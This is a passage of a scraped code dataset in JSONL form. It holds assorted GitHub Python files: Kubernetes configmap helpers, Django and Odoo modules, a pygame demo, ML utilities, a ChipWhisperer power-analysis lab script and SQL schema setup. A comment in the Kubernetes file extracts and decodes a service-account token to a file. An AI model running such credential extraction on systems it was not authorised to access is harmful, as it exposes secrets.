body=yaml_body, \n namespace=\"{}\".format(namespace))\n\n data=__format_data_for_create_configmap(resp)\n return data\n except ApiException as e:\n print(\"ERROR IN create_deployment:\\n{}\".format(e.body))\n print(\"TYPE :{}\".format(type(e)))\n return __format_data_for_create_configmap(e.body)\n\ndef delete_configmap(k8s_object_name=None,namespace=\"default\"):\n try:\n resp = v1.delete_namespaced_config_map(\n name=k8s_object_name,\n namespace=\"{}\".format(namespace),\n body=v1.delete_namespaced_config_map(k8s_object_name, namespace)\n )\n except ApiException as e:\n print(\"ERROR IN create_deployment:\\n{}\".format(e.body))\n print(\"TYPE :{}\".format(type(e)))\n return __format_data_for_create_configmap(e.body)\n\n# export secret=$(kubectl get serviceaccount default -o json | jq -r '.secrets[].name')\n# kubectl get secret $secret -o yaml | grep \"token:\" | awk {'print $2'} | base64 -d > token\n# APISERVER=$(kubectl config view | grep server | cut -f 2- -d \":\" | tr -d \" \")\nif __name__ == '__main__':\n create_configmap(\"default\")\n #update_configmap(k8s_object_name=\"munish\")\n #delete_configmap(k8s_object_name=\"munish\")","repo_name":"mumehta/python-k8s","sub_path":"test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21691335937","text":"from django.urls import path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\nfrom . import views\n\nurlpatterns = [\n path('', views.posts),\n path('create/', views.create_post),\n path('my-posts/', views.my_posts),\n path('/', views.post),\n path('/delete/', views.delete_post),\n path('/edit/', views.edit_post),\n]\n","repo_name":"safwantaliparamba/Blog-App","sub_path":"Backend/api/v1/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6962660575","text":"from openerp import api, models\nfrom odoo.exceptions import UserError\n\n\nclass PaymentCnabReport(models.AbstractModel):\n _name = 'report.br_payment_invoice.report_cnab_payment_invoice'\n\n @api.model\n def get_report_values(self, docids, data=None):\n report = self.env['ir.actions.report']._get_report_from_name(\n 'br_payment_invoice.report_cnab_payment_invoice')\n lines = []\n docs = []\n for docid in docids:\n doc = self.env['account.invoice'].browse(docid)\n docs.append(doc)\n lines.append(doc.get_order_line())\n docargs = {\n 'doc_ids': docids,\n 'doc_model': report.model,\n 'docs': self,\n 'lines': lines,\n }\n if not lines:\n raise UserError(\n \"Este documento ainda não possui um comprovante de pagamento.\")\n return docargs\n","repo_name":"mamcode/wbsfoosbr","sub_path":"br_payment_invoice/reports/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"24333903315","text":"import pygame\r\n\r\npygame.init()\r\n\r\n#display dimensions\r\ndisplay_width = 1200\r\ndisplay_height = 640\r\n\r\n#colour\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nred = (230, 0, 0)\r\nbright_red = (255, 0, 0)\r\nlight_brown = (139, 69, 19)\r\nmidnight_blue = (25, 25, 112)\r\ngrey = (128, 128, 128)\r\nlight_grey = (192, 192, 192)\r\ncardboard_brown = (165, 136, 85)\r\nmint_green = (152, 255, 152)\r\ntan = (196,144,124)\r\npeach = (255,224,189)\r\n\r\n#player\r\nplx = 500\r\nply = 250\r\nxmov = 0\r\nymov = 0\r\nms = 2\r\n\r\n\r\ndisplayScreen = pygame.display.set_mode((display_width,display_height))\r\npxa = pygame.PixelArray(displayScreen)\r\npygame.display.set_caption('Test')\r\nclock = pygame.time.Clock()\r\n\r\nkeys = pygame.key.get_pressed()\r\n\r\ndef character():\r\n global plx, ply\r\n pygame.draw.rect(displayScreen, tan, (plx+8, ply-10, 20, 10))\r\n head = pygame.draw.ellipse(displayScreen, peach, (plx-7, ply-55, 50, 50))\r\n pygame.draw.rect(displayScreen, black, (plx+8, ply-32, 4, 8))\r\n pygame.draw.rect(displayScreen, black, (plx+24, ply-32, 4, 8))\r\n pygame.draw.rect(displayScreen, black, (plx, ply, 36, 40))\r\n pygame.draw.rect(displayScreen, red, (plx+10, ply, 16, 40))\r\n pygame.draw.polygon(displayScreen, black, ((plx,ply),(plx,ply+10),(plx-22,ply+20)))\r\n pygame.draw.polygon(displayScreen, black, ((plx+36,ply),(plx+36,ply+10),(plx+54,ply+20)))\r\n pygame.draw.rect(displayScreen, black, (plx+3, ply+40, 10, 30))\r\n pygame.draw.rect(displayScreen, black, (plx+22, ply+40, 10, 30))\r\n #pxa[10, 20] = black\r\n\r\n\r\n \r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n xmov = 0\r\n ymov = 0\r\n ms = 1\r\n\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_a]:\r\n xmov = -1\r\n if keys[pygame.K_d]:\r\n xmov = 1\r\n if keys[pygame.K_w]:\r\n ymov = -1\r\n if keys[pygame.K_s]:\r\n ymov = 1\r\n\r\n\r\n plx += xmov * ms\r\n ply += ymov * ms\r\n\r\n displayScreen.fill(white)\r\n character()\r\n pygame.display.update()\r\n\r\n","repo_name":"josephz03/CPT-Game","sub_path":"Development/Movement.py","file_name":"Movement.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33390912641","text":"from lxml import etree as et\nimport nltk\nimport xml.etree.cElementTree as ET\nimport csv\nimport ast\nimport time\nfrom nltk import word_tokenize\n\n\n# necessary for named entity recognition. The xml corpus is reformed into plain text format\ndef create_text():\n parser = et.XMLParser(encoding='iso-8859-5', recover=True)\n tree = et.parse(\"../corpora/ukwac1_fixed.xml\", parser)\n\n root = tree.getroot()\n\n with open(\"../xml_as_text_for_ner.txt\", \"w\") as txt_out:\n\n for txt in root.findall('text'):\n for sentence in txt.findall('s'):\n sent = \"\"\n\n is_single_open = False\n\n line = sentence.text.split('\\n')\n\n for word, next_word in zip(line, line[1:] + [line[0]]):\n if word == '':\n continue\n\n word = word.split('\\t')\n next_word = next_word.split('\\t')\n\n if next_word[0] in [\",\", \".\", \"'\", \")\"]:\n sent += word[0]\n elif next_word[0] == \"n't\":\n sent += word[0]\n elif next_word[0] == \"'re\":\n sent += word[0]\n elif next_word[0] == \"'s\":\n sent += word[0]\n elif next_word[0] == \"'ll\":\n sent += word[0]\n elif next_word[0] == \":\":\n sent += word[0]\n elif word[0] == \"(\":\n sent += word[0]\n elif word[0] == \"'\":\n if is_single_open:\n sent += word[0] + \" \"\n is_single_open = False\n else:\n sent += word[0]\n is_single_open = True\n else:\n sent += word[0] + \" \"\n txt_out.write(sent+\"\\n\")\n\n\n# creates a vocabulary xml file for easier processing\ndef create_vocabulary_xml():\n with open(\"../O2_match_vocabulary_to_sentences/matched_vocabulary.csv\", 'r') as voc_in:\n sent_reader = csv.reader(voc_in, delimiter=';')\n next(sent_reader)\n\n voc_root = ET.Element(\"root\")\n pos_root = ET.Element(\"root\")\n\n pos_list = []\n for v_row in sent_reader:\n\n voc_doc = ET.SubElement(voc_root, \"vocable\", name=v_row[1].replace(\"\\“\", \""\"))\n ET.SubElement(voc_doc, \"lemma\", name=v_row[5].replace(\"\\“\", \""\"))\n ET.SubElement(voc_doc, \"chapter\", name=v_row[15])\n ET.SubElement(voc_doc, \"book\", name=v_row[16])\n ET.SubElement(voc_doc, \"pos\", name=(str(v_row[7]).replace(\"\\“\", \""\")))\n\n tuple_pair = ast.literal_eval(v_row[7])\n #print(tuple_pair)\n for tp in tuple_pair:\n if isinstance(tp, list):\n print(tp)\n for t in tp:\n #print(t)\n pos_list.append((str(t[0]).replace(\"\\“\", \""\"),\n str(t[1]).replace(\"\\“\", \""\"),\n v_row[15],\n v_row[16]))\n else:\n #print(tp)\n pos_list.append((str(tp[0]).replace(\"\\“\", \""\"),\n str(tp[1]).replace(\"\\“\", \""\"),\n v_row[15],\n v_row[16]))\n\n pos_list_set = list(set(pos_list))\n for pos_tuple in pos_list_set:\n pos_doc = ET.SubElement(pos_root, \"lemma\", name=pos_tuple[0])\n ET.SubElement(pos_doc, \"pos\", name=pos_tuple[1])\n ET.SubElement(pos_doc, \"chapter\", name=pos_tuple[2])\n ET.SubElement(pos_doc, \"book\", name=pos_tuple[3])\n tree_voc = ET.ElementTree(voc_root)\n tree_pos = ET.ElementTree(pos_root)\n tree_voc.write(\"./input/voc.xml\")\n tree_pos.write(\"./input/lemma_chap_book_pos.xml\")\n voc_in.close()\n\nif __name__ == \"__main__\":\n # create_text()\n create_vocabulary_xml()\n","repo_name":"Mells/Preprocess03","sub_path":"O3_extract_sentences_from_corpus/00_preprocess.py","file_name":"00_preprocess.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40514565210","text":"import numpy as np\n\ndef selectThreshold(yval, pval):\n #SELECTTHRESHOLD Find the best threshold (epsilon) to use for selecting\n #outliers\n # [bestEpsilon bestF1] = SELECTTHRESHOLD(yval, pval) finds the best\n # threshold to use for selecting outliers based on the results from a\n # validation set (pval) and the ground truth (yval).\n #\n \n bestEpsilon = 0\n bestF1 = 0\n F1 = 0\n \n stepsize = (max(pval) - min(pval)) / 1000\n for epsilon in np.arange(min(pval),max(pval),stepsize):\n # ====================== YOUR CODE HERE ======================\n # Instructions: Compute the F1 score of choosing epsilon as the\n # threshold and place the value in F1. The code at the\n # end of the loop will compare the F1 score for this\n # choice of epsilon and set it to be the best epsilon if\n # it is better than the current choice of epsilon.\n # \n # Note: You can use predictions = (pval < epsilon) to get a binary vector\n # of 0's and 1's of the outlier predictions\n \n tp, fp, fn = 0,0,0\n prec, rec = 0,0\n \n predictions = pval < epsilon\n predictions = np.reshape(predictions, (yval.shape))\n\n # predict anomaly & actual anomaly\n tp = sum((predictions == 1) & (yval == 1))\n \n # predict anomaly & actual nonanomaly\n fp = sum((predictions == 1) & (yval == 0))\n \n # predict nonanomaly & actual anomaly\n fn = sum((predictions == 0) & (yval == 1))\n\n # RuntimeWarning: invalid value encountered in true_divide\n # 0으로 나누는 것을 방지하기 위해 dummy 를 분모에 더해준다.\n dummy = 1e-7\n\n prec = tp / (tp + fp + dummy)\n rec = tp / (tp + fn + dummy)\n F1 = 2 * prec * rec / (prec + rec + dummy)\n # =============================================================\n \n if F1 > bestF1:\n bestF1 = F1\n bestEpsilon = epsilon\n \n return bestEpsilon, bestF1","repo_name":"jo1jun/Machine-Learning-Python","sub_path":"ex8/selectThreshold.py","file_name":"selectThreshold.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71089736223","text":"# Example of how to work with model predictions...\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nresults_csv = '../data/test_results_transformer_moves.csv'\n# results_csv = '../data/test_results_stockfish_score.csv'\ndf = pd.read_csv(results_csv)\n\np_correct = df[df['move_played'] == True]['p_model']\navg_nll = np.average(-np.log(p_correct))\nprint('NLL:', avg_nll)\n\nplt.hist(p_correct, color='k', bins=np.geomspace(1e-5, 1e0, 21), rwidth=0.8, zorder=10)\nplt.xscale('log')\nplt.grid()\nplt.show()\n","repo_name":"gregdeon/cpsc-540-ml","sub_path":"project/analysis/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12649474057","text":"#!/usr/bin/python3\n\"\"\"\nClass BaseModel module\n\"\"\"\nimport uuid\nfrom datetime import datetime\nimport models\n\n\nclass BaseModel:\n \"\"\"\n Defines all common attributes/methods for other classes\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"\n Class contractor\n\n Args:\n args - positional arguments\n kwargs - key value pair arguments\n \"\"\"\n \n if kwargs:\n format_str = '%Y-%m-%dT%H:%M:%S.%f'\n for key, value in kwargs.items():\n if key == '__class__':\n continue\n elif key == 'created_at':\n self.created_at = datetime.strptime(\n kwargs['created_at'], format_str)\n elif key == 'updated_at':\n self.updated_at = datetime.strptime(\n kwargs['updated_at'], format_str)\n else:\n setattr(self, key, value)\n else:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n models.storage.new(self) \n\n def __str__(self):\n \"\"\"Returns string representation of BaseModel instances\"\"\"\n\n clsName = self.__class__.__name__\n return \"[{}] ({}) {}\".format(clsName, self.id, self.__dict__)\n\n def save(self):\n \"\"\"Updates the attribute updated_at with the current datetime\"\"\"\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\"Returns a dictionary that contains all\n keys values pair of the instance\"\"\"\n my_dict = self.__dict__.copy()\n my_dict['updated_at'] = self.updated_at.isoformat()\n my_dict['created_at'] = self.created_at.isoformat()\n my_dict['__class__'] = self.__class__.__name__\n return my_dict\n","repo_name":"DOREENKDAVID/AirBnB_clone","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"26839861583","text":"from rest_framework.permissions import BasePermission, SAFE_METHODS\nfrom rest_framework.request import Request\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom api.v1.comparisons.models import ComparisonGroup, Comparison\n\n\nclass IsComparisonGroupAuthorOrReadOnly(BasePermission):\n def has_object_permission(\n self, request: Request, view: APIView, comparison_group: ComparisonGroup\n ) -> bool:\n return bool(\n request.method in SAFE_METHODS or request.user == comparison_group.author\n )\n\n\nclass IsComparisonCreatorOrReadOnly(BasePermission):\n def has_object_permission(\n self, request: Request, view: APIView, comparison: Comparison\n ) -> bool:\n return bool(\n request.method in SAFE_METHODS or request.user == comparison.creator\n )\n\n\nclass IsAuthorOfComparisonPassedInBodyIfExists(BasePermission):\n def has_permission(self, request: Request, view: GenericViewSet) -> bool:\n try:\n comparison_group = ComparisonGroup.objects.get(\n id=request.data[\"comparison_group_id\"]\n )\n return bool(\n request.method in SAFE_METHODS\n or request.user == comparison_group.author\n )\n except (KeyError, ComparisonGroup.DoesNotExist):\n return True\n","repo_name":"FCTL3314/HealthNutrition-Backend","sub_path":"api/v1/comparisons/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"7720390600","text":"class Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n hp = []\n ans = 0\n intervals.sort(key=lambda x:x[0])\n \n for s,e in intervals:\n if hp and s>=hp[0][0]:\n heappop(hp)\n heappush(hp,(e,(s,e)))\n ans = max(ans,len(hp))\n return ans","repo_name":"sudo-vaibhav/leetcode-solutions","sub_path":"0253-meeting-rooms-ii/0253-meeting-rooms-ii.py","file_name":"0253-meeting-rooms-ii.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"12514021794","text":"import os\nfrom tkinter.tix import MAX\nimport cv2\nimport imageio\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom glob import glob\nfrom utils.argmaxMeanIOU import ArgmaxMeanIOU\nfrom tensorflow import keras, argmax\nfrom utils.dataset import CATEGORIES_COLORS\n\nIMG_SIZE = (720, 480)\nOUTPUT_SIZE = (450, 300)\n\nVIDEO_PATH = r\"F:\\ROAD_VIDEO\\CLIP\\*\"\nMODEL_PATH = r\"./trained_models/AttentionResUNet-F16_MultiDataset_384-384_epoch-60_loss-0.31_miou_0.54.h5\"\n\nSHOW_FRAMES = False\nEXPORT_GIF = True\nMAX_60SEC = True\nMAX_BATCH_SIZE = 25\n\nGIF_DURATION = 40\n\nif __name__ == \"__main__\":\n\n for model_path in glob(MODEL_PATH):\n\n segmentation_model = keras.models.load_model(model_path, custom_objects={'ArgmaxMeanIOU': ArgmaxMeanIOU})\n segmentation_model_size = segmentation_model.get_layer(index=0).input_shape[0][1:-1][::-1]\n\n # video_path = r\"F:\\ROAD_VIDEO\\CLIP\\ombre complexe + croisement de route.mp4\"\n for video_path in glob(VIDEO_PATH):\n\n video_name = os.path.basename(video_path)\n model_name = os.path.basename(model_path)\n\n video_capture = cv2.VideoCapture(video_path)\n\n frame_count = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))\n\n image_lst = []\n\n i = 0\n\n img_for_process = []\n\n with tqdm(total=frame_count, desc=\"Video : \" + video_name) as pbar:\n\n while video_capture.isOpened():\n ret, frame = video_capture.read()\n\n i += 1\n\n if not ret or (MAX_60SEC and i > 120 * 10):\n print(\"Error while reading the video.\")\n break\n\n img_resized = cv2.resize(frame, segmentation_model_size, interpolation=cv2.INTER_AREA)\n img_resized = cv2.cvtColor(img_resized, cv2.COLOR_RGB2BGR)\n\n img_for_process.append(img_resized)\n\n if len(img_for_process) == MAX_BATCH_SIZE:\n\n img_for_process = np.array(img_for_process)\n\n result_batch = segmentation_model.predict(img_for_process / 255. )\n\n for i in range(MAX_BATCH_SIZE):\n\n img_resized = img_for_process[i]\n result_segmentation = result_batch[i]\n\n # Argmax\n result_segmentation = argmax(result_segmentation, axis=-1)\n segmentation = np.zeros(result_segmentation.shape + (3,), dtype=np.uint8)\n for categorie in CATEGORIES_COLORS.keys():\n segmentation[result_segmentation == categorie] = CATEGORIES_COLORS[categorie][\"color\"]\n\n if segmentation_model_size != OUTPUT_SIZE:\n img_resized = cv2.resize(img_resized, OUTPUT_SIZE, interpolation=cv2.INTER_AREA)\n segmentation = cv2.resize(segmentation, OUTPUT_SIZE, interpolation=cv2.INTER_AREA)\n\n overlay_segmentation = cv2.addWeighted(img_resized, 0.7, segmentation, 0.7, 0.52)\n output_image = cv2.hconcat([img_resized, segmentation, overlay_segmentation])\n\n image_lst.append(output_image)\n\n if SHOW_FRAMES:\n cv2.imshow(\"self.EVT_SEGMENTATION_IMAGE\", cv2.cvtColor(segmentation, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"self.EVT_ROAD_IMAGE\", cv2.cvtColor(img_resized, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"output_image\", cv2.cvtColor(output_image, cv2.COLOR_RGB2BGR))\n\n if cv2.waitKey(1) == ord('q'):\n break\n\n pbar.update(1)\n\n img_for_process = []\n\n pbar.close()\n\n if EXPORT_GIF:\n print(\"Printing GIF\")\n imageio.mimsave('./image/' + video_name + \"---\" + model_name + '.gif', image_lst, fps=40, subrectangles=True)\n print(\"GIF saved\")","repo_name":"n-rocher/RoadSegmentation","sub_path":"tools/to_gif.py","file_name":"to_gif.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"9049325862","text":"'''\nHelper functions\n'''\nimport numpy as np\nimport cv2\n\n\ndef sliding_window(img, window_size, step_size):\n \"\"\"slide a window across the image and yield windows data iteratively\"\"\"\n for y in xrange(0, img.shape[0], step_size[1]):\n for x in xrange(0, img.shape[1], step_size[0]):\n # yield current window\n # NOTE: this window may be smaller than expected window_size\n yield (x, y, img[y:y + window_size[1], x:x + window_size[0]])\n\n\ndef sliding_window_faster(img, window_size, step_size):\n \"\"\"silde a window across the image and\n return the standard windows tensor with xy\"\"\"\n standard_windows = []\n x_vec, y_vec = [], []\n for y in xrange(0, img.shape[0], step_size[1]):\n for x in xrange(0, img.shape[1], step_size[0]):\n window = img[y:y + window_size[1], x:x + window_size[0]]\n if window.shape == (window_size[1], window_size[0]):\n x_vec.append(x)\n y_vec.append(y)\n standard_windows.append(window)\n\n return x_vec, y_vec, standard_windows\n\n\ndef pyramid(img, downscale=1.5, min_size=(30, 30)):\n \"\"\"compute image pyramid through down sampling\"\"\"\n # min_size: (w, h)\n yield img\n\n while True:\n h = int(img.shape[0] / downscale)\n w = int(img.shape[1] / downscale)\n img = cv2.resize(img, (w, h))\n\n if img.shape[0] < min_size[1] or img.shape[1] < min_size[0]:\n break\n\n yield img\n\n\ndef draw_detections(img, detections):\n for det in detections:\n cv2.rectangle(img, (det[0], det[1]), (det[2], det[3]),\n color=(0, 0, 0), thickness=2)\n\n cv2.imshow('detection', img)\n cv2.waitKey(0)\n\n\ndef find_biggest_window(detections):\n \"\"\"find the biggest bounding window from detections matrix\"\"\"\n x1 = detections[:, 0]\n y1 = detections[:, 1]\n x2 = detections[:, 2]\n y2 = detections[:, 3]\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n idx = np.argmax(area)\n\n return detections[idx]\n\n\ndef get_overlap(box1, box2):\n \"\"\"compute the overlap of box1 and box2 comparing to box1 area\"\"\"\n area = (box1[2] - box1[0] + 1.0) * (box1[3] - box1[1] + 1.0)\n xx1 = max(box1[0], box2[0])\n yy1 = max(box1[1], box2[1])\n xx2 = min(box1[2], box2[2])\n yy2 = min(box1[3], box2[3])\n w = max(0, xx2 - xx1)\n h = max(0, yy2 - yy1)\n\n return w * h / area\n","repo_name":"xueeinstein/it-shoes","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"27538282334","text":"SCOPETYPE = 'OPENADC'\nPLATFORM = 'CWLITEXMEGA'\nCRYPTO_TARGET='TINYAES128C'\nSS_VER='SS_VER_1_1'\n\nexec(open(\"basic_setup.py\").read())\n\ncw.program_target(scope, prog, \"../hardware/victims/firmware/simpleserial-aes/simpleserial-aes-CWLITEXMEGA.hex\".format(PLATFORM))\n\n\nimport numpy as np\nimport time\n\nktp = cw.ktp.Basic()\ntrace_array = []\ntextin_array = []\n\nkey, text = ktp.next()\n\ntarget.set_key(key)\n\nN = 100\nfor i in range(N):\n scope.arm()\n if text[0] & 0x01:\n text[0] = 0x0F\n else:\n text[0] = 0x00\n target.simpleserial_write('p', text)\n \n ret = scope.capture()\n if ret:\n print(\"Target timed out!\")\n continue\n \n response = target.simpleserial_read('r', 16)\n \n trace_array.append(scope.get_last_trace())\n textin_array.append(text)\n \n key, text = ktp.next()\n\n\n#MAIN\n\nassert len(trace_array) == 100\nprint(\"✔️ OK to continue!\")\n\none_list = []\nzero_list = []\nfor i in range(len(trace_array)):\n if textin_array[i][0] == 0x00:\n one_list.append(trace_array[i])\n else:\n zero_list.append(trace_array[i])\n\none_avg = np.mean(one_list, axis = 0)\nzero_avg = np.mean(zero_list, axis = 0)\n\ndiff_avg = one_avg - zero_avg\n\nimport matplotlib.pyplot as plt\nplt.plot(diff_avg)\nplt.show()","repo_name":"VladTalmaciu/CW_tests","sub_path":"scripts/lab_3_1.py","file_name":"lab_3_1.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25948586580","text":"from operator import attrgetter\n\nfrom flask import abort, request\n\nfrom ...services.brand import service as brand_service\nfrom ...services.orga import service as orga_service\nfrom ...services.orga import birthday_service as orga_birthday_service\nfrom ...services.user import service as user_service\nfrom ...util.export import serialize_to_csv\nfrom ...util.framework.blueprint import create_blueprint\nfrom ...util.framework.flash import flash_success\nfrom ...util.templating import templated\nfrom ...util.views import redirect_to, respond_no_content, textified\n\nfrom ..authorization.decorators import permission_required\nfrom ..authorization.registry import permission_registry\nfrom ..orga_team_admin.authorization import OrgaTeamPermission\n\nfrom .authorization import OrgaBirthdayPermission, OrgaDetailPermission\nfrom .forms import OrgaFlagCreateForm\n\n\nblueprint = create_blueprint('orga_admin', __name__)\n\n\npermission_registry.register_enum(OrgaBirthdayPermission)\npermission_registry.register_enum(OrgaDetailPermission)\npermission_registry.register_enum(OrgaTeamPermission)\n\n\n@blueprint.route('/persons')\n@permission_required(OrgaDetailPermission.view)\n@templated\ndef persons():\n \"\"\"List brands to choose from.\"\"\"\n brands_with_person_counts = orga_service.get_brands_with_person_counts()\n\n return {\n 'brands_with_person_counts': brands_with_person_counts,\n }\n\n\n@blueprint.route('/persons/')\n@permission_required(OrgaDetailPermission.view)\n@templated\ndef persons_for_brand(brand_id):\n \"\"\"List organizers for the brand with details.\"\"\"\n brand = _get_brand_or_404(brand_id)\n\n orgas = orga_service.get_orgas_for_brand(brand.id)\n\n return {\n 'brand': brand,\n 'orgas': orgas,\n }\n\n\n@blueprint.route('/persons//create')\n@permission_required(OrgaTeamPermission.administrate_memberships)\n@templated\ndef create_orgaflag_form(brand_id):\n \"\"\"Show form to give the organizer flag to a user.\"\"\"\n brand = _get_brand_or_404(brand_id)\n\n form = OrgaFlagCreateForm()\n\n return {\n 'brand': brand,\n 'form': form,\n }\n\n\n@blueprint.route('/persons/', methods=['POST'])\n@permission_required(OrgaTeamPermission.administrate_memberships)\ndef create_orgaflag(brand_id):\n \"\"\"Give the organizer flag to a user.\"\"\"\n brand = _get_brand_or_404(brand_id)\n\n form = OrgaFlagCreateForm(request.form)\n\n user_id = form.user_id.data.strip()\n user = _get_user_or_404(user_id)\n\n orga_flag = orga_service.create_orga_flag(brand.id, user.id)\n\n flash_success('{} wurde das Orga-Flag für die Marke {} gegeben.',\n orga_flag.user.screen_name, orga_flag.brand.title)\n return redirect_to('.persons_for_brand', brand_id=orga_flag.brand.id)\n\n\n@blueprint.route('/persons//', methods=['DELETE'])\n@permission_required(OrgaTeamPermission.administrate_memberships)\n@respond_no_content\ndef remove_orgaflag(brand_id, user_id):\n \"\"\"Remove the organizer flag for a brand from a person.\"\"\"\n orga_flag = orga_service.find_orga_flag(brand_id, user_id)\n\n if orga_flag is None:\n abort(404)\n\n brand = orga_flag.brand\n user = orga_flag.user\n\n orga_service.delete_orga_flag(orga_flag)\n\n flash_success('{} wurde das Orga-Flag für die Marke {} entzogen.',\n user.screen_name, brand.title)\n\n\n@blueprint.route('/persons//export')\n@permission_required(OrgaDetailPermission.view)\n@textified\ndef export_persons(brand_id):\n \"\"\"Export the list of organizers for the brand as a CSV document in\n Microsoft Excel dialect.\n \"\"\"\n brand = 
_get_brand_or_404(brand_id)\n\n field_names = [\n 'Benutzername',\n 'Vorname',\n 'Nachname',\n 'Geburtstag',\n 'Straße',\n 'PLZ',\n 'Ort',\n 'Land',\n 'E-Mail-Adresse',\n 'Telefonnummer',\n ]\n\n def to_dict(user):\n date_of_birth = user.detail.date_of_birth.strftime('%d.%m.%Y') \\\n if user.detail.date_of_birth else None\n\n return {\n 'Benutzername': user.screen_name,\n 'Vorname': user.detail.first_names,\n 'Nachname': user.detail.last_name,\n 'Geburtstag': date_of_birth,\n 'Straße': user.detail.street,\n 'PLZ': user.detail.zip_code,\n 'Ort': user.detail.city,\n 'Land': user.detail.country,\n 'E-Mail-Adresse': user.email_address,\n 'Telefonnummer': user.detail.phone_number,\n }\n\n orgas = orga_service.get_orgas_for_brand(brand.id)\n orgas.sort(key=attrgetter('screen_name'))\n rows = map(to_dict, orgas)\n return serialize_to_csv(field_names, rows)\n\n\n@blueprint.route('/birthdays')\n@permission_required(OrgaBirthdayPermission.list)\n@templated\ndef birthdays():\n orgas = list(\n orga_birthday_service.collect_orgas_with_next_birthdays(limit=5))\n\n return {\n 'orgas': orgas,\n }\n\n\ndef _get_brand_or_404(brand_id):\n brand = brand_service.find_brand(brand_id)\n\n if brand is None:\n abort(404)\n\n return brand\n\n\ndef _get_user_or_404(user_id):\n user = user_service.find_user(user_id)\n\n if user is None:\n abort(404)\n\n return user\n","repo_name":"agreements/byceps","sub_path":"byceps/blueprints/orga_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"}
+{"seq_id":"38874396888","text":"import sqlalchemy\n\n\n\ndef create_DB(connection):\n connection.execute(\n \"\"\"\n create table if not exists Execut (\n Idexec serial primary key,\n Name varchar(40) not null\n );\n\n create table if not exists Albums (\n Idalbum serial primary key,\n Name varchar(40) not null,\n Year integer not null\n );\n\n create table if not exists Song (\n Idsong serial primary key,\n Name varchar(40) not null,\n Length integer not null,\n Idalbum integer not null,\n FOREIGN KEY (Idalbum) REFERENCES Albums (Idalbum)\n );\n\n create table if not exists Collection (\n Idcollection serial primary key,\n Name varchar(40) not null,\n Year integer not null\n );\n\n create table if not exists Styles (\n Idstyle serial primary key,\n Name varchar(40) not null\n );\n \"\"\")\n\ndef create_link(connection):\n connection.execute(\n \"\"\"\n create table if not exists CollectionSong (\n Idcollection integer references Collection(Idcollection),\n Idsong integer references Song(Idsong),\n constraint CollectionSong_pk primary key (Idcollection, Idsong)\n );\n\n create table if not exists AlbumsExec (\n Idalbum integer references Albums(Idalbum),\n Idexec integer references Execut(Idexec),\n constraint AlbumsExec_pk primary key (Idalbum, Idexec)\n );\n\n create table if not exists StylesExec (\n Idstyle integer references Styles(Idstyle),\n Idexec integer references Execut(Idexec),\n constraint StylesExec_pk primary key (Idstyle, Idexec)\n );\n \"\"\")\n\ndef add_execut_DB(connection):\n table = 'Execut'\n column = 'Name'\n executors = ['Исполнитель один',\n 'Второй',\n 'Третий',\n 'Четвертый',\n 'Пятый исполнитель',\n 'Шестой',\n 'Седьмой',\n 'Восьмой'] # xD\n for executor in executors:\n value = f\"\"\"insert into {table}({column}) values('{executor}');\"\"\"\n connection.execute(value)\n\ndef add_albums_DB(connection):\n table = 'albums'\n column1 = 'name'\n column2 = 'year'\n albums = [['One',2020],\n ['Two',2021],\n ['Three',2019],\n ['Four',1999],\n ['Five',2000],\n 